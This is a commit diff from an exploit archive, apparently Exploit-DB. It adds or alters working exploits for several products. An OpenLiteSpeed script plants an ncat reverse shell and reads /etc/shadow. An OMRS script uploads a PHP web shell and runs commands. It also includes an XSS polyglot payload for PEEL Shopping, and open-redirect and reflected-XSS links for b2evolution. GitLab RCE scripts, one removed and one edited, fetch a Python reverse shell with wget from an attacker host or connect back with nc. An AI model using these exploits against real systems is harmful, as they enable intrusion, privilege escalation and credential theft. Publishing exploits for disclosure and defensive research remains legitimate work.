DB: 2021-02-12
8 changes to exploits/shellcodes Online Marriage Registration System 1.0 - Remote Code Execution Online Marriage Registration System 1.0 - Remote Code Execution (1) Gitlab 11.4.7 - Remote Code Execution GitLab 11.4.7 - Remote Code Execution (Authenticated) (1) Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated) Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (2) GitLab 11.4.7 - Remote Code Execution (Authenticated) GitLab 11.4.7 - RCE (Authenticated) GitLab 11.4.7 - RCE (Authenticated) (2) Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated) Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated) (1) PEEL Shopping 9.3.0 - 'address' Stored Cross-Site Scripting b2evolution 6.11.6 - 'redirect_to' Open Redirect b2evolution 6.11.6 - 'tab3' Reflected XSS Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2) Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3)
This commit is contained in:
parent
fcdaf2028f
commit
b96bdbcfa5
8 changed files with 287 additions and 273 deletions
142
exploits/multiple/webapps/49556.py
Executable file
142
exploits/multiple/webapps/49556.py
Executable file
|
@ -0,0 +1,142 @@
|
||||||
|
# Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2)
|
||||||
|
# Date: 26/1/2021
|
||||||
|
# Exploit Author: Metin Yunus Kandemir
|
||||||
|
# Discovered by: cmOs - SunCSR
|
||||||
|
# Vendor Homepage: https://openlitespeed.org/
|
||||||
|
# Software Link: https://openlitespeed.org/kb/install-from-binary/
|
||||||
|
# Version: 1.7.8
|
||||||
|
|
||||||
|
import requests
|
||||||
|
import sys
|
||||||
|
import urllib3
|
||||||
|
from bs4 import BeautifulSoup
|
||||||
|
|
||||||
|
"""
|
||||||
|
Description:
|
||||||
|
The "path" parameter has command injection vulnerability that leads to escalate privilege.
|
||||||
|
OpenLiteSpeed (1.7.8) web server runs with user(nobody):group(nogroup) privilege. However, extUser and
|
||||||
|
extGroup parameters could be used to join a group (GID) such as shadow, sudo, etc.
|
||||||
|
Details: https://github.com/litespeedtech/openlitespeed/issues/217
|
||||||
|
Example:
|
||||||
|
Step-1:
|
||||||
|
ubuntu@ubuntu:~$ cat /etc/shadow
|
||||||
|
cat: /etc/shadow: Permission denied
|
||||||
|
Step-2:
|
||||||
|
ubuntu@ubuntu:~$ nc -nvlp 4444
|
||||||
|
Listening on [0.0.0.0] (family 0, port 4444)
|
||||||
|
Step-3:
|
||||||
|
ubuntu@ubuntu:~/Desktop/exploits$ python3 openlitespeed.py 192.168.1.116:7080 admin MWE1ZmE2 shadow
|
||||||
|
[+] Authentication was successful!
|
||||||
|
[+] Version is detected: OpenLiteSpeed 1.7.8
|
||||||
|
[+] The target is vulnerable!
|
||||||
|
[+] tk value is obtained: 0.98296300 1612966522
|
||||||
|
[+] Sending reverse shell to 127.0.0.1:4444 ...
|
||||||
|
[+] Triggering command execution...
|
||||||
|
Step-4:
|
||||||
|
ubuntu@ubuntu:~$ nc -nvlp 4444
|
||||||
|
Listening on [0.0.0.0] (family 0, port 4444)
|
||||||
|
Connection from 127.0.0.1 54534 received!
|
||||||
|
cat /etc/shadow
|
||||||
|
root:!:18620:0:99999:7:::
|
||||||
|
daemon:*:17937:0:99999:7:::
|
||||||
|
bin:*:17937:0:99999:7:::
|
||||||
|
sys:*:17937:0:99999:7:::
|
||||||
|
sync:*:17937:0:99999:7:::
|
||||||
|
.
|
||||||
|
.
|
||||||
|
.
|
||||||
|
"""
|
||||||
|
|
||||||
|
def triggerCommandExec(target, s):
|
||||||
|
data = {"act" : "restart"}
|
||||||
|
trigger = s.post("https://"+target+"/view/serviceMgr.php", data = data, allow_redirects=False, verify=False)
|
||||||
|
if trigger.status_code == 200:
|
||||||
|
print("[+] Triggering command execution...")
|
||||||
|
else:
|
||||||
|
print("[-] Someting went wrong!")
|
||||||
|
|
||||||
|
def commandExec(tk, groupId, s, target):
|
||||||
|
data = {
|
||||||
|
"name" : "lsphp",
|
||||||
|
"address" : "uds://tmp/lshttpd/lsphp.sock",
|
||||||
|
"note" : "",
|
||||||
|
"maxConns" : "10",
|
||||||
|
"env" : "PHP_LSAPI_CHILDREN=10",
|
||||||
|
"initTimeout" : "60",
|
||||||
|
"retryTimeout" : "0",
|
||||||
|
"persistConn" : "1",
|
||||||
|
"pcKeepAliveTimeout" : "",
|
||||||
|
"respBuffer" : "0",
|
||||||
|
"autoStart" : "2",
|
||||||
|
"path" : "/usr/bin/ncat -nv 127.0.0.1 4444 -e /bin/bash",
|
||||||
|
"backlog" : "100",
|
||||||
|
"instances" : "1",
|
||||||
|
"extUser" : "root",
|
||||||
|
"extGroup" : groupId ,
|
||||||
|
"umask" : "",
|
||||||
|
"runOnStartUp" : "1",
|
||||||
|
"extMaxIdleTime" : "",
|
||||||
|
"priority" : "0",
|
||||||
|
"memSoftLimit" : "2047M",
|
||||||
|
"memHardLimit" : "2047M",
|
||||||
|
"procSoftLimit" : "1400",
|
||||||
|
"procHardLimit" : "",
|
||||||
|
"a" : "s",
|
||||||
|
"m" : "serv",
|
||||||
|
"p" : "ext",
|
||||||
|
"t" : "A_EXT_LSAPI",
|
||||||
|
"r" : "lsphp",
|
||||||
|
"tk" : tk
|
||||||
|
}
|
||||||
|
exec = s.post("https://" + target + "/view/confMgr.php", data = data, allow_redirects=False, verify=False)
|
||||||
|
|
||||||
|
if exec.status_code == 200:
|
||||||
|
if exec.text == "Illegal entry point!":
|
||||||
|
print("[-] tk value is incorrect!")
|
||||||
|
sys.exit(1)
|
||||||
|
else:
|
||||||
|
print("[+] Sending reverse shell to 127.0.0.1:4444 ...")
|
||||||
|
else:
|
||||||
|
print("[-] Something went wrong!")
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
triggerCommandExec(target, s)
|
||||||
|
|
||||||
|
def loginReq(target, username, password, groupId):
|
||||||
|
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
||||||
|
s = requests.Session()
|
||||||
|
data = {"userid" : username , "pass" : password }
|
||||||
|
login = s.post("https://" + target + "/login.php" , data = data, allow_redirects=False, verify=False)
|
||||||
|
|
||||||
|
if login.status_code == 302:
|
||||||
|
print("[+] Authentication was successful!")
|
||||||
|
elif login.status_code == 200:
|
||||||
|
print("[-] Authentication was unsuccessful!")
|
||||||
|
sys.exit(1)
|
||||||
|
else:
|
||||||
|
print("[-] Connection error!")
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
version = s.get("https://" + target + "/index.php")
|
||||||
|
versionSource = BeautifulSoup(version.text, "html.parser")
|
||||||
|
v = versionSource.find('div', {'class':'project-context hidden-xs'}).text
|
||||||
|
print("[+] Version is detected: OpenLiteSpeed %s" %(v.split()[2]))
|
||||||
|
if v.split()[2] == "1.7.8":
|
||||||
|
print("[+] The target is vulnerable!")
|
||||||
|
|
||||||
|
#getting tk value
|
||||||
|
getTk = s.get("https://" + target + "/view/confMgr.php?m=serv&p=ext")
|
||||||
|
source = BeautifulSoup(getTk.text, 'html.parser')
|
||||||
|
tk = source.find('input', {'name':'tk'}).get('value')
|
||||||
|
print("[+] tk value is obtained: "+tk)
|
||||||
|
commandExec(tk, groupId, s, target)
|
||||||
|
|
||||||
|
def main(args):
|
||||||
|
if len(args) != 5:
|
||||||
|
print("usage: %s targetIp:port username password groupId " %(args[0]))
|
||||||
|
print("Example: python3 openlitespeed.py 192.168.1.116:7080 admin MWE1ZmE2 shadow")
|
||||||
|
sys.exit(1)
|
||||||
|
loginReq(target=args[1], username=args[2], password=args[3], groupId=args[4])
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
main(args=sys.argv)
|
19
exploits/php/webapps/49553.txt
Normal file
19
exploits/php/webapps/49553.txt
Normal file
|
@ -0,0 +1,19 @@
|
||||||
|
# Exploit Title: PEEL Shopping 9.3.0 - 'address' Stored Cross-Site Scripting
|
||||||
|
# Date: 2021-02-11
|
||||||
|
# Exploit Author: Anmol K Sachan
|
||||||
|
# Vendor Homepage: https://www.peel.fr/
|
||||||
|
# Software Link: https://sourceforge.net/projects/peel-shopping/
|
||||||
|
# Software: : PEEL SHOPPING 9.3.0
|
||||||
|
# Vulnerability Type: Stored Cross-site Scripting
|
||||||
|
# Vulnerability: Stored XSS
|
||||||
|
# Tested on Windows 10 XAMPP
|
||||||
|
# This application is vulnerable to Stored XSS vulnerability.
|
||||||
|
# Vulnerable script: http://localhost/peel-shopping_9_3_0/utilisateurs/change_params.php
|
||||||
|
# Vulnerable parameters: 'Address'
|
||||||
|
# Payload used:
|
||||||
|
|
||||||
|
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()
|
||||||
|
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
|
||||||
|
|
||||||
|
# POC: in the same page where we injected payload click on the text box to edit the address.
|
||||||
|
# You will see your Javascript code (XSS) executed.
|
16
exploits/php/webapps/49554.txt
Normal file
16
exploits/php/webapps/49554.txt
Normal file
|
@ -0,0 +1,16 @@
|
||||||
|
# Exploit Title: b2evolution 6.11.6 - 'redirect_to' Open Redirect
|
||||||
|
# Date: 10/02/2021
|
||||||
|
# Exploit Author: Soham Bakore, Nakul Ratti
|
||||||
|
# Vendor Homepage: https://b2evolution.net/
|
||||||
|
# Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405
|
||||||
|
# Version: 6.11.6
|
||||||
|
# Tested on: latest version of Chrome, Firefox on Windows and Linux
|
||||||
|
# CVE : CVE-2020-22840
|
||||||
|
|
||||||
|
|
||||||
|
--------------------------Proof of Concept-----------------------
|
||||||
|
|
||||||
|
|
||||||
|
1. Send the following link : http://127.0.0.1/htsrv/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fgoogle.com to the unsuspecting user
|
||||||
|
2. The user will be redirected to Google.com or any other attacker controlled domain
|
||||||
|
3. This can be used to perform malicious phishing campaigns on unsuspecting users
|
16
exploits/php/webapps/49555.txt
Normal file
16
exploits/php/webapps/49555.txt
Normal file
|
@ -0,0 +1,16 @@
|
||||||
|
# Exploit Title: b2evolution 6.11.6 - 'tab3' Reflected XSS
|
||||||
|
# CVE: CVE-2020-22839
|
||||||
|
# Date: 10/02/2021
|
||||||
|
# Exploit Author: Nakul Ratti, Soham Bakore
|
||||||
|
# Vendor Homepage: https://b2evolution.net/
|
||||||
|
# Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405
|
||||||
|
# Version: 6.11.6
|
||||||
|
# Tested on: latest version of Chrome, Firefox on Windows and Linux
|
||||||
|
|
||||||
|
--------------------------Proof of Concept-----------------------
|
||||||
|
|
||||||
|
Steps to Reproduce:
|
||||||
|
|
||||||
|
1. Send the following URL http://HOST/evoadm.php?.ctrl=comments&filter=restore&tab3=123%22onmouseover=%22alert(document.domain)%22&blog=1&blog=1 to the logged in victim using any social engineering technique.
|
||||||
|
2. When an unsuspecting user with high privileges opens this URL, XSS will be triggered which will execute the malicious javascript payload in users browser.
|
||||||
|
3. The vulnerable parameter in this case is “tab3”.
|
79
exploits/php/webapps/49557.py
Executable file
79
exploits/php/webapps/49557.py
Executable file
|
@ -0,0 +1,79 @@
|
||||||
|
# Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3)
|
||||||
|
# Date: 10/02/2021
|
||||||
|
# Exploit Author: Ricardo Ruiz (@ricardojoserf)
|
||||||
|
# Vendor Homepage: https://phpgurukul.com/
|
||||||
|
# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
|
||||||
|
# Version: 1.0
|
||||||
|
# Tested on: Windows 10/Xampp Server and Wamp Server
|
||||||
|
# Porting an existing exploit (https://www.exploit-db.com/exploits/49260, for macOs) to Linux/Windows. Adding the possibility of automatic registration and execution of any command without needing to upload any local file
|
||||||
|
# Example with registration: python3 script.py -u http://172.16.1.102:80/ -c 'whoami'
|
||||||
|
# Example without registration: python3 script.py -u http://172.16.1.102:80/ -c 'whoami' -m 680123456 -p dante123
|
||||||
|
|
||||||
|
import os
|
||||||
|
import sys
|
||||||
|
import random
|
||||||
|
import argparse
|
||||||
|
import requests
|
||||||
|
|
||||||
|
|
||||||
|
def get_args():
|
||||||
|
parser = argparse.ArgumentParser()
|
||||||
|
parser.add_argument('-u', '--url', required=True, action='store', help='Url of Online Marriage Registration System (OMRS) 1.0')
|
||||||
|
parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')
|
||||||
|
parser.add_argument('-m', '--mobile', required=False, action='store', help='Mobile phone used for registration')
|
||||||
|
parser.add_argument('-p', '--password', required=False, action='store', help='Password used for registration')
|
||||||
|
my_args = parser.parse_args()
|
||||||
|
return my_args
|
||||||
|
|
||||||
|
|
||||||
|
def login(url, mobile, password):
|
||||||
|
url = "%s/user/login.php"%(url)
|
||||||
|
payload = {'mobno':mobile, 'password':password, 'login':''}
|
||||||
|
req = requests.post(url, data=payload)
|
||||||
|
return req.cookies['PHPSESSID']
|
||||||
|
|
||||||
|
|
||||||
|
def upload(url, cookie, file=None):
|
||||||
|
url = "%s/user/marriage-reg-form.php"%url
|
||||||
|
files = {'husimage': ('shell.php', "<?php $command = shell_exec($_REQUEST['cmd']); echo $command; ?>", 'application/x-php', {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')}
|
||||||
|
payload = {'dom':'05/01/2020','nofhusband':'omrs_rce', 'hreligion':'omrs_rce', 'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'omrs_rce','hzipcode':'omrs_rce','hstate':'omrs_rce','hadharno':'omrs_rce','nofwife':'omrs_rce','wreligion':'omrs_rce','wsbmarriage':'Bachelor','waddress':'omrs_rce','wzipcode':'omrs_rce','wstate':'omrs_rce','wadharno':'omrs_rce','witnessnamef':'omrs_rce','waddressfirst':'omrs_rce','witnessnames':'omrs_rce','waddresssec':'omrs_rce','witnessnamet':'omrs_rce','waddressthird':'omrs_rce','submit':''}
|
||||||
|
req = requests.post(url, data=payload, cookies={'PHPSESSID':cookie}, files=files)
|
||||||
|
print('[+] PHP shell uploaded')
|
||||||
|
|
||||||
|
|
||||||
|
def get_remote_php_files(url):
|
||||||
|
url = "%s/user/images"%(url)
|
||||||
|
req = requests.get(url)
|
||||||
|
php_files = []
|
||||||
|
for i in req.text.split(".php"):
|
||||||
|
php_files.append(i[-42:])
|
||||||
|
return php_files
|
||||||
|
|
||||||
|
|
||||||
|
def exec_command(url, webshell, command):
|
||||||
|
url_r = "%s/user/images/%s?cmd=%s"%(url, webshell, command)
|
||||||
|
req = requests.get(url_r)
|
||||||
|
print("[+] Command output\n%s"%(req.text))
|
||||||
|
|
||||||
|
|
||||||
|
def register(mobile, password, url):
|
||||||
|
url_r = "%s/user/signup.php"%(url)
|
||||||
|
data = {"fname":"omrs_rce", "lname":"omrs_rce", "mobno":mobile, "address":"omrs_rce", "password":password, "submit":""}
|
||||||
|
req = requests.post(url_r, data=data)
|
||||||
|
print("[+] Registered with mobile phone %s and password '%s'"%(mobile,password))
|
||||||
|
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
args = get_args()
|
||||||
|
url = args.url
|
||||||
|
command = args.command
|
||||||
|
mobile = str(random.randint(100000000,999999999)) if args.mobile is None else args.mobile
|
||||||
|
password = "dante123" if args.password is None else args.password
|
||||||
|
if args.password is None or args.mobile is None:
|
||||||
|
register(mobile,password,url)
|
||||||
|
cookie = login(url, mobile, password)
|
||||||
|
initial_php_files = get_remote_php_files(url)
|
||||||
|
upload(url, cookie)
|
||||||
|
final_php_files = get_remote_php_files(url)
|
||||||
|
webshell = (list(set(final_php_files) - set(initial_php_files))[0]+".php")
|
||||||
|
exec_command(url,webshell,command)
|
|
@ -1,262 +0,0 @@
|
||||||
# Exploit Title: GitLab 11.4.7 Authenticated Remote Code Execution (No Interaction Required)
|
|
||||||
# Date: 15th December 2020
|
|
||||||
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
|
|
||||||
# Software Link: https://about.gitlab.com/
|
|
||||||
# POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
|
|
||||||
# Tested on: GitLab 11.4.7 CE
|
|
||||||
# CVE : CVE-2018-19571 (SSRF),CVE-2018-19585 (CRLF)
|
|
||||||
|
|
||||||
import requests
|
|
||||||
import re
|
|
||||||
import warnings
|
|
||||||
from bs4 import BeautifulSoup
|
|
||||||
import sys
|
|
||||||
import base64
|
|
||||||
import urllib
|
|
||||||
from random_words import RandomWords
|
|
||||||
import argparse
|
|
||||||
import os
|
|
||||||
import time
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
parser = argparse.ArgumentParser(description='GitLab 11.4.7 Authenticated RCE')
|
|
||||||
parser.add_argument('-U',help='GitLab Username')
|
|
||||||
parser.add_argument('-P',help='Gitlab Password')
|
|
||||||
parser.add_argument('-l',help='rev shell lhost')
|
|
||||||
parser.add_argument('-p',help='rev shell lport ',type=int)
|
|
||||||
args = parser.parse_args()
|
|
||||||
|
|
||||||
|
|
||||||
username = args.U
|
|
||||||
password = args.P
|
|
||||||
lhost = args.l
|
|
||||||
lport = args.p
|
|
||||||
|
|
||||||
|
|
||||||
#Retrieve CSRF Token
|
|
||||||
|
|
||||||
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
|
|
||||||
gitlab_url = "http://10.129.49.62:5080"
|
|
||||||
request = requests.Session()
|
|
||||||
print("[+] Retrieving CSRF token to submit the login form")
|
|
||||||
time.sleep(1)
|
|
||||||
page = request.get(gitlab_url+"/users/sign_in")
|
|
||||||
html_content = page.text
|
|
||||||
soup = BeautifulSoup(html_content,features="lxml")
|
|
||||||
token = soup.findAll('meta')[16].get("content")
|
|
||||||
|
|
||||||
|
|
||||||
print("[+] CSRF Token : "+token)
|
|
||||||
time.sleep(1)
|
|
||||||
|
|
||||||
|
|
||||||
#Login
|
|
||||||
|
|
||||||
login_info ={
|
|
||||||
"authenticity_token": token,
|
|
||||||
"user[login]": username,
|
|
||||||
"user[password]": password,
|
|
||||||
"user[remember_me]": "0"
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
login_request = request.post(gitlab_url+"/users/sign_in",login_info)
|
|
||||||
|
|
||||||
|
|
||||||
if login_request.status_code==200:
|
|
||||||
print("[+] Login Successful")
|
|
||||||
time.sleep(1)
|
|
||||||
|
|
||||||
else:
|
|
||||||
|
|
||||||
print("Login Failed")
|
|
||||||
print(" ")
|
|
||||||
sys.exit()
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
#Exploitation
|
|
||||||
|
|
||||||
print("[+] Running Exploit")
|
|
||||||
time.sleep(1)
|
|
||||||
print("[+] Using IPV6 URL 'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/ssrf.git' to bypass filter")
|
|
||||||
time.sleep(1)
|
|
||||||
|
|
||||||
ipv6_url = "git%3A%2F%2F%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A6379%2Ftest%2Fssrf.git"
|
|
||||||
|
|
||||||
|
|
||||||
r = RandomWords()
|
|
||||||
project_name = r.random_word()
|
|
||||||
project_url = '%s/%s/'%(gitlab_url,username)
|
|
||||||
|
|
||||||
print("[+] Creating Project")
|
|
||||||
time.sleep(1)
|
|
||||||
print("[+] Project Name : "+project_name)
|
|
||||||
time.sleep(1)
|
|
||||||
|
|
||||||
print("[+] Creating Python Reverse Shell")
|
|
||||||
time.sleep(1)
|
|
||||||
|
|
||||||
|
|
||||||
python_shell = 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'%(lhost,lport)
|
|
||||||
|
|
||||||
|
|
||||||
os.system("touch shell.py")
|
|
||||||
shell_file = open("shell.py","w")
|
|
||||||
shell_file.write(python_shell)
|
|
||||||
shell_file.close()
|
|
||||||
|
|
||||||
|
|
||||||
print("[+] Reverse Shell Generated")
|
|
||||||
time.sleep(1)
|
|
||||||
|
|
||||||
print("[+] Start HTTP Server in current directory")
|
|
||||||
|
|
||||||
|
|
||||||
print("Command : python3 -m http.server 80")
|
|
||||||
time.sleep(2)
|
|
||||||
|
|
||||||
http_server = raw_input("Continue (Y/N) : ")
|
|
||||||
|
|
||||||
if (http_server=="N") or (http_server=="n"):
|
|
||||||
print("Start HTTP Server before running exploit")
|
|
||||||
|
|
||||||
elif (http_server=="Y") or (http_server=="y"):
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
print("Run this script twice with options below to get SHELL!")
|
|
||||||
print("")
|
|
||||||
print("Option 1 : Download shell.py rev shell to server using wget")
|
|
||||||
print("Option 2 : Execute shell.py downloaded previously")
|
|
||||||
|
|
||||||
option = raw_input("Option (1/2) : ")
|
|
||||||
|
|
||||||
|
|
||||||
if option=="1":
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
reverse_shell= """\nmulti
|
|
||||||
sadd resque:gitlab:queues system_hook_push
|
|
||||||
lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid wget http://%s/shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"
|
|
||||||
exec
|
|
||||||
exec
|
|
||||||
exec\n""" %(lhost)
|
|
||||||
|
|
||||||
|
|
||||||
project_page = request.get(gitlab_url+"/projects/new")
|
|
||||||
html_content = project_page.text
|
|
||||||
soup = BeautifulSoup(html_content,features="lxml")
|
|
||||||
project_token = soup.findAll('meta')[16].get("content")
|
|
||||||
namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value')
|
|
||||||
urlencoded_token1 = project_token.replace("==","%3D%3D")
|
|
||||||
urlencoded_token_final = urlencoded_token1.replace("+","%2B")
|
|
||||||
|
|
||||||
|
|
||||||
payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name)
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
proxies = {
|
|
||||||
"http" : "http://127.0.0.1:8080",
|
|
||||||
"https" : "https://127.0.0.1:8080",
|
|
||||||
}
|
|
||||||
|
|
||||||
cookies = {
|
|
||||||
'sidebar_collapsed': 'false',
|
|
||||||
'event_filter': 'all',
|
|
||||||
'hide_auto_devops_implicitly_enabled_banner_1': 'false',
|
|
||||||
'_gitlab_session':request.cookies['_gitlab_session'],
|
|
||||||
}
|
|
||||||
|
|
||||||
headers = {
|
|
||||||
'Host': '10.129.49.31:5080',
|
|
||||||
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
|
|
||||||
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
|
||||||
'Accept-Language': 'en-US,en;q=0.5',
|
|
||||||
'Accept-Encoding': 'gzip, deflate',
|
|
||||||
'Referer': 'http://10.129.49.31:5080/projects',
|
|
||||||
'Content-Type': 'application/x-www-form-urlencoded',
|
|
||||||
'Content-Length': '398',
|
|
||||||
'Connection': 'close',
|
|
||||||
'Upgrade-Insecure-Requests': '1',
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
#response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False)
|
|
||||||
|
|
||||||
response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False)
|
|
||||||
print("[+] Success!")
|
|
||||||
time.sleep(1)
|
|
||||||
print("[+] Run Exploit with Option 2")
|
|
||||||
|
|
||||||
|
|
||||||
elif option=="2":
|
|
||||||
|
|
||||||
reverse_shell= """\nmulti
|
|
||||||
sadd resque:gitlab:queues system_hook_push
|
|
||||||
lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid python3 shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"
|
|
||||||
exec
|
|
||||||
exec
|
|
||||||
exec\n"""
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
project_page = request.get(gitlab_url+"/projects/new")
|
|
||||||
html_content = project_page.text
|
|
||||||
soup = BeautifulSoup(html_content,features="lxml")
|
|
||||||
project_token = soup.findAll('meta')[16].get("content")
|
|
||||||
namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value')
|
|
||||||
urlencoded_token1 = project_token.replace("==","%3D%3D")
|
|
||||||
urlencoded_token_final = urlencoded_token1.replace("+","%2B")
|
|
||||||
|
|
||||||
|
|
||||||
payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name)
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
proxies = {
|
|
||||||
"http" : "http://127.0.0.1:8080",
|
|
||||||
"https" : "https://127.0.0.1:8080",
|
|
||||||
}
|
|
||||||
|
|
||||||
cookies = {
|
|
||||||
'sidebar_collapsed': 'false',
|
|
||||||
'event_filter': 'all',
|
|
||||||
'hide_auto_devops_implicitly_enabled_banner_1': 'false',
|
|
||||||
'_gitlab_session':request.cookies['_gitlab_session'],
|
|
||||||
}
|
|
||||||
|
|
||||||
headers = {
|
|
||||||
'Host': '10.129.49.31:5080',
|
|
||||||
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
|
|
||||||
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
|
||||||
'Accept-Language': 'en-US,en;q=0.5',
|
|
||||||
'Accept-Encoding': 'gzip, deflate',
|
|
||||||
'Referer': 'http://10.129.49.31:5080/projects',
|
|
||||||
'Content-Type': 'application/x-www-form-urlencoded',
|
|
||||||
'Content-Length': '398',
|
|
||||||
'Connection': 'close',
|
|
||||||
'Upgrade-Insecure-Requests': '1',
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
#response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False)
|
|
||||||
|
|
||||||
response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False)
|
|
||||||
print("[+] Success!")
|
|
||||||
time.sleep(1)
|
|
||||||
print("[+] Spawning Reverse Shell")
|
|
|
@ -1,10 +1,10 @@
|
||||||
# Exploit Title: GitLab 11.4.7 - RCE (Authenticated)
|
# Exploit Title: GitLab 11.4.7 RCE (POC)
|
||||||
# Date: 24th December 2020
|
# Date: 24th December 2020
|
||||||
# Exploit Author: Sam Redmond
|
# Exploit Author: Norbert Hofmann
|
||||||
|
# Original Exploit Authors: Sam Redmond, Tam Lai Yin
|
||||||
# Software Link: https://gitlab.com/
|
# Software Link: https://gitlab.com/
|
||||||
# Environment: GitLab 11.4.7, community edition
|
# Environment: GitLab 11.4.7, community edition
|
||||||
# CVE: CVE-2018-19571 + CVE-2018-19585
|
# CVE: CVE-2018-19571 + CVE-2018-19585
|
||||||
# Version: 11.4.7
|
|
||||||
|
|
||||||
#!/usr/bin/python3
|
#!/usr/bin/python3
|
||||||
|
|
||||||
|
@ -26,7 +26,7 @@ username = args.u
|
||||||
password = args.p
|
password = args.p
|
||||||
gitlab_url = args.g + ":5080"
|
gitlab_url = args.g + ":5080"
|
||||||
local_ip = args.l
|
local_ip = args.l
|
||||||
local_port = args.p
|
local_port = args.P
|
||||||
|
|
||||||
session = requests.Session()
|
session = requests.Session()
|
||||||
|
|
||||||
|
@ -56,7 +56,7 @@ print(f"[+] Creating project with random name: {project_name}")
|
||||||
|
|
||||||
form = """\nmulti
|
form = """\nmulti
|
||||||
sadd resque:gitlab:queues system_hook_push
|
sadd resque:gitlab:queues system_hook_push
|
||||||
lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|""" + f'nc {local_ip} {local_port}' + """ \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1608799993.1234567,\\"enqueued_at\\":1608799993.1234567}"
|
